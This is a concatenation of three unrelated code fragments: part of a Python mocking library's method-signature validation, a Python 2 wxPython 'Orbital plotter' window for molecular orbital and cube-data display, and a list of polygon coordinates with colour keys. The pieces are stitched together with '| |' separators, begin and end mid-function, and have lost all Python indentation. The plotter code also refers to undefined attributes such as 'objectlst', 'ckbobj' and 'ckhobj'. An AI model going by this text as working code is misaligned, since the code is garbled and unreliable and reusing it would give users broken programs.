minimum = args_len - (allowed.defaults and len(allowed.defaults) or 0)
maximum = None
if allowed.varargs is None and allowed.varkw is None:
maximum = args_len
total_positional = len(kargs + tuple(a for a in kwargs if a in allowed.args))
named_optionals = [
a
for a in kwargs
if allowed.defaults
if a in allowed.args[len(allowed.args) - len(allowed.defaults) :]
]
if allowed.defaults and total_positional == minimum and named_optionals:
minimum += len(named_optionals)
if total_positional < minimum:
arguments = "argument" if minimum == 1 else "arguments"
raise MethodSignatureError(
f"{self._name} requires at least {minimum} {arguments}, "
f"expectation provided {total_positional}"
)
if maximum is not None and total_positional > maximum:
arguments = "argument" if maximum == 1 else "arguments"
raise MethodSignatureError(
f"{self._name} requires at most {maximum} {arguments}, "
f"expectation provided {total_positional}"
)
if args_len == len(kargs) and any(a for a in kwargs if a in allowed.args):
given_args = [a for a in kwargs if a in allowed.args]
arguments = "argument" if len(given_args) == 1 else "arguments"
raise MethodSignatureError(
f"{given_args} already given as positional {arguments} to {self._name}"
)
if not allowed.varkw and any(
a for a in kwargs if a not in allowed.args + allowed.kwonlyargs
):
invalid_arg = [a for a in kwargs if a not in allowed.args + allowed.kwonlyargs][0]
raise MethodSignatureError(
f"{invalid_arg} is not a valid keyword argument to {self._name}"
)
# check that kwonlyargs that don't have default value specified are provided
required_kwonlyargs = [
a for a in allowed.kwonlyargs if a not in (allowed.kwonlydefaults or {})
]
missing_kwonlyargs = [a for a in required_kwonlyargs if a not in kwargs]
if missing_kwonlyargs:
arguments = "argument" if len(missing_kwonlyargs) == 1 else "arguments"
missing_args = '", "'.join(missing_kwonlyargs)
raise MethodSignatureError(
f'{self._name} requires keyword-only {arguments} "{missing_args}"'
)
def _update_original(self, name: str, obj: Any) -> None:
if hasattr(obj, "__dict__") and name in obj.__dict__:
self._original = obj.__dict__[name]
else:
self._original = getattr(obj, name)
self._update_argspec()
def _update_argspec(self) -> None:
original = self.__dict__.get("_original")
if original:
try:
self._argspec = inspect.getfullargspec(original)
except TypeError:
# built-in function: fall back to stupid processing and hope the
# builtins don't change signature
pass
def _normalize_named_args(self, *kargs: Any, **kwargs: Any) -> Dict[str, Any]:
argspec = self._argspec
default = | |
#!/bin/sh
# -*- coding:utf-8
import os
#import psutil # downloaded from http://code.google.com/p/psutil/downloads/detail?name=psutil-1.0.1.win32-py2.7.exe&can=2&q=
import wxversion
wxversion.select("2.8")
import wx
# import FU modules
import fumodel
import view
import const
import lib
import molec
import graph
from numpy import *
try: import fucubelib
except: pass
class DrawOrbital():
def __init__(self,parent,model,viewer):
self.parent=parent
self.model=model
self.viewer=viewer
self.orbitallst=[]
def OpenDrawWin(self,orbitallst):
self.draworb=DrawOrbital_Frm(self.parent,-1,self.parent,self.viewer,orbitallst=orbitallst)
def SetOrbitalList(self,orbitallst):
self.orbitallst=orbitallst
def SetMode(self,mode):
self.mode=mode
def SetViewer(self,viewer):
self.viewer=viewer
class DrawOrbital_Frm(wx.MiniFrame):
def __init__(self,parent,id,model,viewer,mode=0,winpos=[-1,-1],
orbitallst=[]): #,model,ctrlflag,molnam,winpos):
"""
:param obj parent: parent object
:param int id: object id
:param obj model: an instance of "Model" (model.py)
:param obj viewer: viewer instance
:param int mode: 0 for stand alone, 1 for child (no menu)
"""
self.title='Orbital plotter'
self.orbitallst=orbitallst
self.magnify=False
###self.orbitallst=[[[-20,-15,-10,5,10,15]],[[-50,-20,-15,-10,5,10,15],[-15,-10,-5,8,10,12]]]
#self.orbitallst=[[[-20,-15,-10,5,10,15]]]
norbpanel=len(self.orbitallst)
#if norbpanel <= 0: norbpanel=1
self.orbitalpanwidth=115
winwidth=100+8+norbpanel*self.orbitalpanwidth
if norbpanel <= 0: winwidth=110
winsize=lib.MiniWinSize([winwidth,340]) #([100,355])
self.norbpanel=norbpanel
wx.MiniFrame.__init__(self,parent,id,self.title,pos=winpos,size=winsize,
style=wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.FRAME_FLOAT_ON_PARENT)
self.parent=parent
self.mode=mode
if mode == 1:
self.viewer=viewer
#self.SetTransparent(100)
self.model=model # model #parent.model
#self.mdlwin=model.mdlwin
#self.draw=self.mdlwin.draw
#self.ctrlflag=model.ctrlflag
self.ctrlflag={}
""" need codes """
self.homoorbnmblst=self.norbpanel*[3]
self.maxorbnmblst=self.norbpanel*[20]
self.plotterpanwidth=100
self.orbitalpanwidth=115
self.orbpanel=self.norbpanel*[None]
self.orbtitle=self.norbpanel*['orbiatl']
self.orbgraph=self.norbpanel*[None]
self.orbcheck=self.norbpanel*[None]
self.lumoplus=self.norbpanel*[0]
self.minlumo=self.norbpanel*[0]
self.maxlumo=self.norbpanel*[50]
self.homominus=self.norbpanel*[0]
self.minhomo=self.norbpanel*[0]
self.maxhomo=self.norbpanel*[50]
self.spin=self.norbpanel*['']
self.widgetiddic={}
self.curdata=0
self.erangemin=-15.0
self.erangemax=5.0
# menu
if self.mode == 0:
menud=self.MenuItems() # method of MyModel class
# Create menu using model.fuMenu class
self.menubar=self.MenuItems() # create instance of fuMenu class
self.SetMenuBar(self.menubar) # method of wxFrame class
self.Bind(wx.EVT_MENU,self.OnMenu)
#
self.bgcolor='light gray'
#self.cubedataname=[]
nulobj=CubeObj()
self.denobjdic={}; self.denobjdic[' ']=nulobj
self.denobjlst=[] #[' ','den-cube-1','den-cube-2','den-cube-3']
self.mepobjdic={}; self.mepobjdic[' ']=nulobj
self.mepobjlst=[] #[' ','mep-cube-1','mep-cube-2','mep-cube-3']
self.cubeobjdic={}; self.cubeobjdic[' ']=nulobj
self.cubeobjlst=[]
self.curden=' '
self.curmep=' '
self.curcube=' '
#self.cubefile=''
self.prptxt=['DENSITY','MEP','CUBE']
self.property=0
self.style=0 # 0:solid, 1:mesh
self.ondraw=False
self.superimpose=False
self.xcubemin=0.0; self.xcubemax=0.0
self.ycubemin=0.0; self.ycubemax=0.0
self.zcubemin=0.0; self.zcubemax=0.0
self.xcubecnt=0.0; self.ycubecnt=0.0; self.zcubecnt=0.0
self.valuemin=0.0; self.valuemax=0.0
self.nx=0; self.ny=0; self.nz=0
# params for draw
self.xmin=-1; self.xmax=-1
self.ymin=-1; self.ymax=-1
self.zmin=-1; self.zmax=-1
self.value=0.05
self.interpol=1
self.minipo=1
self.maxipo=4 # maximum degree of intepolation for cube data
self.opacity=0.5 # 0-1
self.colortxt=['red','magenta','yellow','orange','brown','blue','cyan','green','purple',
'white','gray','black','---','palette']
self.colorpos=self.colortxt[0]; self.rgbpos=const.RGBColor[self.colorpos]
self.colorneg=self.colortxt[6]; self.rgbneg=const.RGBColor[self.colorneg]
# polygons
self.polyg=[]
# create panel
self.CreatePlotterPanel()
for i in range(self.norbpanel): self.CreateOrbitalPanel(i)
self.SetParamsToWidgets()
#
if self.mode == 1: self.GetCubeFileAndMakeCubeObjDic()
#
self.Show()
# initialize view
self.InitDrawOrbitalWin()
#orbnmb=self.GetOrbitalNumberInTC()
#self.SetOrbValueToOrbTC(self.curdata,orbnmb)
# activate event handlers
self.Bind(wx.EVT_CLOSE,self.OnClose)
def InitDrawOrbitalWin(self):
self.PlotEnergy()
""" need codes for spin and orbital selection in graph """ #
#spinobj=self.GetSpinObject(self.cutdata)
def OpenInfoPanel(self):
pos=self.GetPosition()
winpos=pos; winsize=[80,40]
self.tcinfo=wx.TextCtrl(None,-1,'',pos=winpos,size=winsize,style=wx.TE_MULTILINE)
self.tcinfo.SetBackgroundColour('light gray')
self.DispCubeDataInfo()
def CreatePlotterPanel(self):
size=self.GetClientSize()
w=size[0]; h=size[1]
w=self.plotterpanwidth
hcb=const.HCBOX # height of combobox
ff='%5.0f'
# upper panel
self.panel=wx.Panel(self,-1,pos=(-1,-1),size=(w,h)) #ysize))
self.panel.SetBackgroundColour(self.bgcolor)
# cubedata
yloc=5; xloc=10
#btninfo=wx.Button(self.panel,wx.ID_ANY,"Data info",pos=(xloc,yloc-2),size=(70,20))
#btninfo.Bind(wx.EVT_BUTTON,self.OnInfo)
#btninfo.SetToolTipString('Display plot data information')
# style
#yloc += 25
ststyle=wx.StaticText(self.panel,-1,label='Style:',pos=(xloc,yloc),size=(35,18))
ststyle.SetToolTipString('Choose drawing style')
#yloc += 18
#self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+10,yloc),size=(45,18),
self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+40,yloc),size=(40,18),
style=wx.RB_GROUP)
self.rbtsold.Bind(wx.EVT_RADIOBUTTON,self.OnSolid)
yloc += 18
#self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+10,yloc),size=(45,18))
self.rbtwire=wx.RadioButton(self.panel,-1,"wire",pos=(xloc+40,yloc),size=(40,18))
self.rbtwire.Bind(wx.EVT_RADIOBUTTON,self.OnWire)
self.rbtsold.SetValue(True)
#
yloc += 20
wx.StaticText(self.panel,-1,"Value(abs):" ,pos=(xloc,yloc),size=(70,18))
yloc += 20
self.tcval=wx.TextCtrl(self.panel,-1,'',pos=(xloc+10,yloc),size=(70,18),
style=wx.TE_PROCESS_ENTER)
self.tcval.Bind(wx.EVT_TEXT_ENTER,self.OnValue)
self.tcval.SetToolTipString('Input value and "ENTER"')
yloc += 25
wx.StaticText(self.panel,-1,"Interp:" ,pos=(xloc,yloc),size=(45,18))
self.spip=wx.SpinCtrl(self.panel,-1,value=str(self.interpol),pos=(xloc+45,yloc),size=(35,18),
style=wx.SP_ARROW_KEYS,min=self.minipo,max=self.maxipo)
self.spip.Bind(wx.EVT_SPINCTRL,self.OnInterpolate)
self.spip.SetToolTipString('Choose interpolation points number.')
yloc += 20
wx.StaticText(self.panel,-1,"Color:",pos=(xloc,yloc),size=(55,18))
yloc += 20
wx.StaticText(self.panel,-1,"+",pos=(xloc+5,yloc),size=(10,18))
self.cbcolp=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \
pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY)
self.cbcolp.Bind(wx.EVT_COMBOBOX,self.OnColorPos)
self.cbcolp.SetToolTipString('Choose color for positive value. "---" is dummy')
yloc += 25
wx.StaticText(self.panel,-1," -" ,pos=(xloc+5,yloc),size=(10,18))
self.cbcoln=wx.ComboBox(self.panel,-1,'',choices=self.colortxt, \
pos=(xloc+20,yloc-3), size=(60,hcb),style=wx.CB_READONLY)
self.cbcoln.Bind(wx.EVT_COMBOBOX,self.OnColorNeg)
self.cbcoln.SetToolTipString('Choose color for negative value. "---" is dummy')
yloc += 25
wx.StaticText(self.panel,-1,"Opacity:" ,pos=(xloc,yloc),size=(50,18))
self.tcopa=wx.TextCtrl(self.panel,-1,('%4.2f' % self.opacity),pos=(xloc+50,yloc-2),size=(30,18),
style=wx.TE_PROCESS_ENTER)
self.tcopa.SetToolTipString('Input opacity value (0-1) and "ENETR"')
self.tcopa.Bind(wx.EVT_TEXT_ENTER,self.OnOpacity)
#self.ckbimp.SetValue(self.superimpose)
yloc += 20
wx.StaticLine(self.panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL)
#yloc += 25
yloc += 8
wx.StaticText(self.panel,-1,"Object:" ,pos=(xloc,yloc),size=(50,18))
yloc += 18
self.cmbobj=wx.ComboBox(self.panel,-1,'',choices=self.cubeobjlst, \
pos=(xloc+5,yloc), size=(75,hcb),style=wx.CB_READONLY)
self.cmbobj.Bind(wx.EVT_COMBOBOX,self.OnObject)
self.cmbobj.SetToolTipString('Choose object for operations')
yloc += 25
self.ckbimp=wx.CheckBox(self.panel,-1,"superimpose",pos=(xloc,yloc),size=(120,18))
self.ckbimp.Bind(wx.EVT_CHECKBOX,self.OnSuperimpose)
self.ckbimp.SetToolTipString('Check for superimpose objects')
yloc += 25
self.btndel=wx.Button(self.panel,wx.ID_ANY,"Del",pos=(xloc,yloc),size=(30,20))
self.btndel.Bind(wx.EVT_BUTTON,self.OnDel)
self.btndel.SetToolTipString('Remove object')
self.btndraw=wx.Button(self.panel,wx.ID_ANY,"Draw",pos=(xloc+40,yloc),size=(45,20))
self.btndraw.Bind(wx.EVT_BUTTON,self.OnDraw)
self.btndraw.SetToolTipString('Draw cube data(toggle "on" and "off")')
def CreateOrbitalPanel(self,idata):
size=self.GetClientSize()
w=size[0]; h=size[1]
w=self.orbitalpanwidth
xpanpos=self.plotterpanwidth+idata*self.orbitalpanwidth
ff='%5.0f'
# upper panel
id=wx.NewId()
panel=wx.Panel(self,id,pos=(xpanpos,0),size=(w,h)) #ysize))
panel.SetBackgroundColour(self.bgcolor)
self.widgetiddic[id]=[idata,'Panel',panel]
# cubedata
yloc=5; xloc=15
#sttit=wx.StaticText(panel,-1,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18))
id=wx.NewId()
label=wx.StaticText(panel,id,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18))
self.widgetiddic[id]=[idata,'Label',label]
label.Bind(wx.EVT_LEFT_DOWN,self.OnOrbTitleLeftClick)
label.SetToolTipString('L-Click to be avtive')
wx.StaticLine(panel,pos=(0,0),size=(4,h),style=wx.LI_VERTICAL)
#ststit.SetToolTipString('Choose drawing style')
yloc += 25
self.wplt=self.orbitalpanwidth-25 #90;
self.hplt=125
id=wx.NewId()
orbgraph=graph.EnergyGraph(panel,id,[xloc,yloc],[self.wplt,self.hplt],'white',retobj=self) #yloc += 25
orbgraph.SetToolTipString('L-Click a bar for select. L-Drag for move plot window')
self.widgetiddic[id]=[idata,'Graph',orbgraph]
#
yloc += self.hplt+10
id=wx.NewId()
btnrdc=wx.Button(panel,id,"<",pos=(xloc,yloc),size=(20,20))
btnrdc.Bind(wx.EVT_BUTTON,self.OnOrbReduce)
btnrdc.SetToolTipString('"<" ("<") key press also reduces/magnifies')
btnrdc.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown)
self.widgetiddic[id]=[idata,'Reduce',btnrdc]
id=wx.NewId()
btnmag=wx.Button(panel,id,">",pos=(xloc+25,yloc),size=(20,20))
btnmag.Bind(wx.EVT_BUTTON,self.OnOrbMagnify)
self.widgetiddic[id]=[idata,'Magnify',btnmag]
btnmag.SetToolTipString('"<" ("<") key press also reduces/magnifies')
btnmag.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown)
id=wx.NewId()
btnset=wx.Button(panel,id,"Reset",pos=(xloc+50,yloc),size=(40,20))
btnset.Bind(wx.EVT_BUTTON,self.OnOrbReset)
btnset.SetToolTipString('Reset draw size')
self.widgetiddic[id]=[idata,'Reset',btnset]
yloc += 25
wx.StaticLine(panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL)
yloc += 8
storb=wx.StaticText(panel,-1,label='Orb:',pos=(xloc,yloc),size=(30,18))
id=wx.NewId()
tcorb=wx.TextCtrl(panel,id,str(self.homoorbnmblst[idata]),pos=(xloc+30,yloc),size=(35,18),
style=wx.TE_PROCESS_ENTER)
tcorb.Bind(wx.EVT_TEXT_ENTER,self.OnEnterOrbitalNumber)
tcorb.SetToolTipString('Input orbital number and "ENTER"')
self.widgetiddic[id]=[idata,'Orb',tcorb]
id=wx.NewId()
btnab=wx.ToggleButton(panel,id,'',pos=(xloc+70,yloc),size=(20,20))
btnab.Bind(wx.EVT_TOGGLEBUTTON,self.OnOrbSpin)
btnab.SetToolTipString('Toggle switch for select alpha or beta orbitals(open shell only')
self.widgetiddic[id]=[idata,'Spin',btnab]
try:
if len(self.data) == 1: btnab.Disable()
else:
self.spin[idata]='a'
btnab.SetLabel(self.spin[idata])
btnab.Refresh()
except: pass
yloc += 25
sthom=wx.StaticText(panel,-1,label='HOMO -',pos=(xloc,yloc),size=(45,18))
id=wx.NewId()
schom=wx.SpinCtrl(panel,id,value=str(self.homominus[idata]),pos=(xloc+45,yloc),size=(45,18),
style=wx.SP_ARROW_KEYS,min=self.minhomo[idata],max=self.maxhomo[idata])
schom.Bind(wx.EVT_SPINCTRL,self.OnOrbHOMO)
schom.SetToolTipString('Set orbital number relative to HOMO')
self.widgetiddic[id]=[idata,'HOMO',schom]
yloc += 25
stlum=wx.StaticText(panel,-1,label='LUMO +',pos=(xloc,yloc),size=(45,18))
id=wx.NewId()
sclum=wx.SpinCtrl(panel,id,value=str(self.lumoplus[idata]),pos=(xloc+45,yloc),size=(45,18),
style=wx.SP_ARROW_KEYS,min=self.minlumo[idata],max=self.maxlumo[idata])
sclum.SetToolTipString('Set orbital number relative to LUMO')
sclum.Bind(wx.EVT_SPINCTRL,self.OnOrbLUMO)
self.widgetiddic[id]=[idata,'LUMO',sclum]
yloc += 25
id=wx.NewId()
btncls=wx.Button(panel,id,"Close",pos=(xloc-5,yloc),size=(45,20))
btncls.Bind(wx.EVT_BUTTON,self.OnOrbClose)
btncls.SetToolTipString('Close this panel')
self.widgetiddic[id]=[idata,'Close',btncls]
id=wx.NewId()
btnapl=wx.Button(panel,id,"Aplly",pos=(xloc+50,yloc),size=(45,20))
btnapl.Bind(wx.EVT_BUTTON,self.OnOrbApply)
btnapl.SetToolTipString('Apply the orbital specified in "Orb" for draw')
self.widgetiddic[id]=[idata,'Aplly',btnapl]
#
self.SetOrbLabelColor(self.curdata)
#self.PlotEnergy()
#self.RefreshGraphPanel()
def OnOrbTitleLeftClick(self,event):
id=event.GetId()
self.curdata=self.widgetiddic[id][0]
print 'id,curdata',id,self.curdata
self.SetOrbLabelColor(self.curdata)
event.Skip()
def PlotEnergy(self):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Graph':
lst[2].SetYRange(self.erangemin,self.erangemax)
lst[2].SetData(self.orbitallst[lst[0]])
#lst[2].SetYAxisLabel('Energy (ev)')
lst[2].Plot(True)
def RefreshGraphPanel(self):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Panel':
lst[2].Refresh(); lst[2].Update()
# for orbital energy panel
def OnOrbSpin(self,event):
id=event.GetId()
value=self.widgetiddic[id][2].GetValue()
if value: label='a'
else: label='b'
self.widgetiddic[id][2].SetLabel(label)
self.spin[self.widgetiddic[id][0]]=value
def SetLabelToSpinButton(self,idata,label):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Spin':
if lst[0] == idata:
lst[2].SetLabel(label)
break
def GetLabelOnSpinButton(self,idata):
label=''
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Spin':
if lst[0] == idata:
label=lst[2].GetLabel()
break
return label
def OnOrbKeyDown(self,event):
# ascii:44:'<',46:'>', unicode: 60:'<',62:'>'
keycode=event.GetKeyCode()
if keycode == 46: self.ZoomEnergyGraph(self.curdata,True)
elif keycode == 44: self.ZoomEnergyGraph(self.curdata,False)
def OnOrbMagnify(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
self.ZoomEnergyGraph(idata,True)
def GetGraphObj(self,idata):
graphobj=None
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Graph' and lst[0] == idata:
graphobj=lst[2]; break
return graphobj
def OnOrbReduce(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
#
self.ZoomEnergyGraph(idata,False)
def ZoomEnergyGraph(self,idata,magnify):
graphobj=self.GetGraphObj(idata)
#
ymin,ymax=graphobj.GetYRange()
yinc=1.0
if magnify: ymin += yinc; ymax -= yinc
else: ymin -= yinc; ymax += yinc
#
graphobj.SetYRange(ymin,ymax)
graphobj.Plot(True)
def SetFocusOnOrbPanel(self,idata):
print 'SetFocuson',idata
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Panel' and lst[0] == idata:
panel=lst[2]; break
panel.SetFocus()
def SetOrbLabelColor(self,idata):
# widgetiddic:{id:[idata,label,obj],...}
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Label':
if lst[0] == idata: color='red'
else: color='black'
lst[2].SetForegroundColour(color)
lst[2].Refresh()
self.curdata=idata
def OnOrbReset(self,event):
# reset energy graph color
graphobj=self.GetGraphObj(self.curdata)
#
ymin=self.erangemin
ymax=self.erangemax
graphobj.SetYRange(ymin,ymax)
graphobj.Plot(True)
def OnOrbApply(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=0
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
value=lst[2].GetValue()
break
print 'value in Apply',value
def OnOrbClose(self,event):
id=event.GetId()
idata=self.curdata #self.widgetiddic[id][0]
pos=self.GetPosition()
try: del self.orbitallst[idata]
except: pass
self.parent.orbobj.SetOrbitalList(self.orbitallst)
self.Destroy()
self.parent.orbobj.OpenDrawOrbitalWin(self.orbitallst)
self.SetPosition(pos)
def GetOrbitalNumberInTC(self):
idata=self.curdata
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
orbnmb=lst[2].GetValue()
orbnmb=int(orbnmb)
return orbnmb
def OnEnterOrbitalNumber(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
self.SetOrbValueToHOMOLUMO(idata,int(value))
def OnOrbHOMO(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
orbnmb=self.homoorbnmblst[idata]-value
if orbnmb <= 1: orbnmb=1
self.SetOrbValueToOrbTC(idata,orbnmb)
def SetOrbValueToHOMOLUMO(self,idata,value):
homo=self.homoorbnmblst[idata]
lumo=homo+1
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'HOMO' and lst[0] == idata:
sval=homo-value
if sval < 0: sval=0
lst[2].SetValue(sval)
lst[2].Refresh()
if lst[1] == 'LUMO' and lst[0] == idata:
sval=value-lumo
if sval < 0: sval=0
lst[2].SetValue(sval)
lst[2].Refresh()
def SetOrbValueToOrbTC(self,idata,orbnmb):
for id,lst in self.widgetiddic.iteritems():
if lst[1] == 'Orb' and lst[0] == idata:
lst[2].SetValue(str(orbnmb))
lst[2].Refresh()
self.SetOrbValueToHOMOLUMO(idata,orbnmb)
label=self.GetLabelOnSpinButton(idata)
if label == 'a': spin=0
elif label == 'b': spin=1
else: spin=-1
graphobj=self.GetGraphObj(idata)
graphobj.SelectOrbital(spin,orbnmb)
def SelectedOrbFromEnergyGraph(self,spin,orbnmb):
self.SetOrbValueToOrbTC(self.curdata,orbnmb)
if spin == 0: label='a'
elif spin == 1: label='b'
else: label=''
self.SetLabelToSpinButton(self.curdata,label)
def OnOrbLUMO(self,event):
id=event.GetId()
idata=self.widgetiddic[id][0]
self.SetOrbLabelColor(idata)
value=self.widgetiddic[id][2].GetValue()
orbnmb=self.homoorbnmblst[idata]+1+value
if orbnmb > self.maxorbnmblst[idata]: orbnmb=self.maxorbnmblst[idata]
self.SetOrbValueToOrbTC(idata,orbnmb)
# for cube plotter panel
def OnDel(self,event):
if len(self.objectlst) <= 1:
# can not delete but close all
return
object=self.ckbobj.GetValue().strip()
# remove plot
try: idx=self.objectlst.index(object)
except: pass
if idx >= 1:
del self.objectlst[idx]
self.ckhobj.SetValue(self.objectlst[idx-1])
def OnObject(self,event):
print 'curobj',self.curobj
self.curobj=self.ckbobj.GetValue().strip()
def OnSuperimpose(self,event):
self.superimpose=self.ckbimp.GetValue()
print 'superimpose',self.superimpose
def GetCubeFileAndMakeCubeObjDic(self):
filename=self.viewer.GetCubeFile()
if os.path.exists(filename):
base,ext=os.path.splitext(filename)
self.cubefile=filename
if ext == '.den' or ext == '.mep' or ext == '.cub':
err=self.AddToCubeObjDic(filename)
else:
mess='The file "'+filename+'" is not cube data (ext should be ".mep" or ".den"'
lib.MessageBoxOK(mess,"")
self.OnClose(1)
else:
mess='Cube file is not found. filename="'+filename+'"'
lib.MessageBoxOK(mess,"")
self.OnClose(1)
def GetDrawPanelParams(self):
#self.ondraw=self.btndraw.GetValue()
return [self.style,self.value,self.interpol,self.colorpos,self.colorneg,
self.opacity,self.ondraw]
def SetDrawPanelParams(self,params):
self.style=params[0]; self.value=params[1]; self.interpol=params[2]
self.colorpos=params[3]; self.colorneg=params[4]; self.opacity=params[5]
self.ondraw=params[6]
self.SetParamsToWidgets()
def SetParamsToWidgets(self):
self.rbtsold.SetValue(True)
if self.style == 1: self.rbtwire.SetValue(True)
self.tcval.SetValue(str(self.value))
self.spip.SetValue(self.interpol)
self.cbcolp.SetValue(self.colorpos) #StringSelection(self.colorpos)
self.cbcoln.SetValue(self.colorneg) | |
-0.337218966457),
(-0.646195113652, -0.33706657095),
(-0.651832284777, -0.336912175174),
(-0.657460070718, -0.336755757338),
(-0.663078327691, -0.336597294951),
(-0.668686909161, -0.336436764791),
(-0.674285665754, -0.336274142883),
(-0.67987444516, -0.336109404467),
(-0.685453092043, -0.335942523975),
(-0.691021447941, -0.335773474994),
(-0.696579351168, -0.335602230244),
(-0.702126636711, -0.335428761544),
(-0.707663136126, -0.335253039779),
(-0.713188677433, -0.335075034873),
(-0.718703085006, -0.334894715749),
(-0.724206179462, -0.334712050303),
(-0.729697777548, -0.334527005364),
(-0.735177692023, -0.334339546661),
(-0.74064573154, -0.33414963879),
(-0.746101700528, -0.333957245169),
(-0.751545399061, -0.333762328011),
(-0.756976622739, -0.333564848278),
(-0.762395162555, -0.333364765644),
(-0.767800804765, -0.333162038458),
(-0.773193330752, -0.332956623698),
(-0.778572516889, -0.332748476935),
(-0.783938134403, -0.332537552286),
(-0.789289949229, -0.332323802375),
(-0.794627721865, -0.332107178286),
(-0.799951207224, -0.331887629519),
(-0.800061826877, -0.329067305958),
(-0.800171433161, -0.326245745465),
(-0.800280027946, -0.323422960291),
(-0.800387613092, -0.32059896265),
(-0.800494190456, -0.317773764719),
(-0.800599761888, -0.31494737864),
(-0.800704329231, -0.312119816518),
(-0.800807894323, -0.309291090424),
(-0.800910458993, -0.306461212392),
(-0.801012025066, -0.303630194427),
(-0.801112594355, -0.300798048496),
(-0.80121216867, -0.297964786535),
(-0.801310749808, -0.295130420449),
(-0.801408339562, -0.292294962109),
(-0.801504939714, -0.289458423355),
(-0.801600552037, -0.286620815998),
(-0.801695178296, -0.283782151816),
(-0.801788820245, -0.280942442558),
(-0.801881479629, -0.278101699945),
(-0.801973158184, -0.275259935665),
(-0.802063857634, -0.272417161382),
(-0.802153579693, -0.269573388726),
(-0.802242326064, -0.266728629303),
(-0.802330098439, -0.26388289469),
(-0.802416898499, -0.261036196436),
(-0.802502727912, -0.258188546063),
(-0.802587588336, -0.255339955066),
(-0.802671481416, -0.252490434913),
(-0.802754408783, -0.249639997048),
(-0.802836372059, -0.246788652886),
(-0.802917372849, -0.243936413817),
(-0.802997412748, -0.241083291206),
(-0.79764025035, -0.241234499334),
(-0.79226904346, -0.24138372094),
(-0.786884040618, -0.241530994487),
(-0.781485484466, -0.241676356932),
(-0.776073611906, -0.241819843776),
(-0.770648654251, -0.241961489114),
(-0.765210837369, -0.242101325684),
(-0.759760381837, -0.242239384909),
(-0.754297503078, -0.242375696948),
(-0.748822411508, -0.242510290738),
(-0.74333531267, -0.242643194038),
(-0.737836407371, -0.242774433474),
(-0.732325891817, -0.242904034577),
(-0.726803957741, -0.243032021826),
(-0.721270792533, -0.243158418691),
(-0.715726579366, -0.243283247663),
(-0.710171497315, -0.243406530303),
(-0.704605721484, -0.243528287271),
(-0.699029423118, -0.243648538363),
(-0.693442769724, -0.243767302551),
(-0.687845925177, -0.243884598012),
(-0.682239049841, -0.244000442164),
(-0.676622300667, -0.244114851695),
(-0.670995831307, -0.244227842601),
(-0.665359792212, -0.244339430211),
(-0.659714330739, -0.244449629216),
(-0.654059591243, -0.244558453705),
(-0.648395715183, -0.244665917183),
(-0.642722841208, -0.244772032609),
(-0.637041105256, -0.244876812412),
(-0.631350640639, -0.244980268524),
(-0.625651578135, -0.245082412402)]},
30: {'color': 'skyblue',
'polygon': [(0.788068525473, -0.145310501727),
(0.788023290986, -0.148190934934),
(0.787977160072, -0.151070866231),
(0.787930131991, -0.153950285308),
(0.787882205996, -0.156829181827),
(0.787833381333, -0.159707545422),
(0.787783657241, -0.162585365701),
(0.787733032954, -0.165462632241),
(0.787681507698, -0.168339334593),
(0.787629080695, -0.171215462277),
(0.787575751162, -0.174091004786),
(0.787521518309, -0.176965951583),
(0.787466381342, -0.1798402921),
(0.787410339463, -0.182714015741),
(0.787353391869, -0.185587111879),
(0.787295537754, -0.188459569858),
(0.787236776306, -0.191331378991),
(0.787177106714, -0.194202528559),
(0.787116528159, -0.197073007814),
(0.787055039824, -0.199942805975),
(0.786992640886, -0.202811912233),
(0.786929330521, -0.205680315745),
(0.786865107905, -0.208548005637),
(0.786799972212, -0.211414971004),
(0.786733922613, -0.21428120091),
(0.786666958282, -0.217146684385),
(0.786599078389, -0.220011410428),
(0.786530282108, -0.222875368008),
(0.78646056861, -0.225738546059),
(0.786389937069, -0.228600933484),
(0.786318386661, -0.231462519155),
(0.786245916561, -0.23432329191),
(0.78617252595, -0.237183240557),
(0.78078038121, -0.237333277422),
(0.775375635617, -0.23748105218),
(0.769958431125, -0.237626635267),
(0.764528910058, -0.237770093694),
(0.759087215015, -0.237911491176),
(0.753633488771, -0.238050888263),
(0.748167874187, -0.238188342468),
(0.742690514127, -0.238323908386),
(0.737201551369, -0.238457637814),
(0.731701128528, -0.238589579865),
(0.726189387981, -0.238719781082),
(0.720666471795, -0.238848285543),
(0.715132521656, -0.23897513497),
(0.709587678806, -0.239100368829),
(0.704032083979, -0.239224024427),
(0.698465877342, -0.239346137011),
(0.692889198443, -0.239466739859),
(0.687302186152, -0.239585864369),
(0.681704978617, -0.239703540148),
(0.676097713213, -0.239819795095),
(0.6704805265, -0.239934655482),
(0.664853554184, -0.240048146032),
(0.659216931071, -0.240160289996),
(0.653570791039, -0.240271109228),
